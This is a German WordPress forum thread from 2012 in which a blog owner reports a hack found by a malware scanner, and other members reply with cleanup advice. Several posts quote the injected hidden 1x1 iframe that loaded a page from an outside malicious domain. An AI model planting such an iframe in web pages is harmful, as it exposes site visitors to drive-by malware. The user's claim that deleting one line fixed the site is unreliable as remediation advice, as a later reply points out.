1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Gehackter Blog - Script Injection? Was ist zu tun

Dieses Thema im Forum "Allgemeines" wurde erstellt von Karin_web, 1. Februar 2012.

  1. Karin_web

    Karin_web Member

    Registriert seit:
    1. Februar 2012
    Beiträge:
    8
    Zustimmungen:
    0
    Liebe Experten, heute entdeckte ich, dass meine Seiten www.webgewandt.de wohl gehackt wurden.

    Mit sitecheck.sucuri.net/scanner/ habe ich das gecheckt- er schlug positiv auf Malware an (die nicht blacklisted ist, kein Wunder denn zu dem genannten Eindringling fand ich bislang kein Posting irgendwo):

    Hidden Iframes.
    Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
    <iframe src=http://www.negrilab.it/old/stata.html WIDTH=1 HEIGHT=1 frameborder=0>

    Known javascript malware.
    Details: http://sucuri.net/malware/malware-entry-mwjsanon7
    <iframe src=http://www.negrilab.it/old/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME><!DOCTYPE html>

    In meinem Quellcode sieht das so aus:
    <head></head>
    <body class="home page page-id-2 page-template page-template-default logged-in">
    <iframe width="1" height="1" frameborder="0" src="http://www.negrilab.it/old/stata.html">
    <meta charset="UTF-8">

    D.h. der Header wurde komplett ersetzt und vermutlich wird mein Inhalt durch den iFrame des A*ochs negrilab.it gekapert. Wie das genau funktioniert weiß ich leider nicht. Wer kann mir helfen, das Problem zu lösen? Leider hab ich kein (aktuelles) Backup (hinterher ist man immer schlauer), weshalb ich dankbar wäre für eine 'Pflückraus-Lösung' ohne alles neu aufzusetzen. In die PHPs hab ich noch nicht im Einzelnen geschaut, weil ich erst einmal Feedback erhoffe.

    System-Voraussetzungen:
    WP 3.0.1.
    Die ht.access wurde nicht bösartig verändert.
    In der wp-config.php hatte ich die $table_prefix aus Sicherheitsgründen geändert.
    Der Benutzername ist ein anderer als der öff. gezeigte Spitzname.
    Niemand anderes darf bei mir schreiben.
    Die Kommentarfunktion ist moderiert und wurde bislang nur für einzelne Seiten freigegeben.

    Meine letzte Aktionen war die Installation des Plugin Orderli am 27.1.
    und die Einbindung eines RSS Feeds im Blogroll.

    Ich bin dankbar für Erläuterungen, ob das eine Script Injection ist, oder was- ich hab mich schon etwas umgesehen, benötige aber noch mehr Input für ein gezieltes Vorgehen.
    Herzlichen Dank!
     
  2. r23

    r23 Well-Known Member

    Registriert seit:
    9. Dezember 2006
    Beiträge:
    7.317
    Zustimmungen:
    582
    Das System ist leider veraltet.

    Bei einer code injection
    http://en.wikipedia.org/wiki/Code_injection

    kannst du keiner Datei mehr trauen. Gleichzeitig werden in der Regel neue Scripte auf den Server gelegt.

    Hier eine sehr gute Anleitung von Google, was gemacht werde sollte
    http://support.google.com/webmasters/bin/answer.py?hl=de&answer=163634

    Wenn du bei der Suche nach der Sicherheitslücke, Update und absichern hilfe benötigst - können wir dir vermutlich helfen schnelle@blogrettung.de

    Viel Glück

    ralf
     
  3. Karin_web

    Karin_web Member

    Registriert seit:
    1. Februar 2012
    Beiträge:
    8
    Zustimmungen:
    0
    Hallo r24, danke für die Antwort.

    Ich habe eine (vorübergehende?) Lösung meines Problems gefunden:

    In der PHP war zusätzlicher Code (jener Iframe) vorne vor eingetragen:

    <iframe src=http://www.negrilab.it/old/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>

    der sich dann in den Quellcode der Seiten eingschrieben hatte.
    Diesen habe ich gelöscht und eine 'jungfräuliche' index.php hochgeladen.

    Dort musste nur noch der Pfad angepasst werden, da mein WP aus einem Unterverzeichnis heraus läuft.

    Werde berichten, ob das genügt hat. Weitere Sicherheitsmaßnahmen werde ich natürlich implementieren - auch Versionupdate...
     
  4. Karin_web

    Karin_web Member

    Registriert seit:
    1. Februar 2012
    Beiträge:
    8
    Zustimmungen:
    0
    Hallo zusammen,

    mein Problem bleibt gelöst, keine neue Malware da, wie der Check ergab.

    Puhh, ein Glück.
    Danke für die Antwort, auch wenn ich mir schließlich selbst geholfen habe!
     
  5. Hille

    Hille Well-Known Member

    Registriert seit:
    22. Januar 2012
    Beiträge:
    7.965
    Zustimmungen:
    9
    Sorry, das ist aber trügerische Sicherheit. Wer sagt dir, das nicht noch weitere Malware o.ä vorhanden ist? So ein Check ist niemals 100%.

    Gruß Hille
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden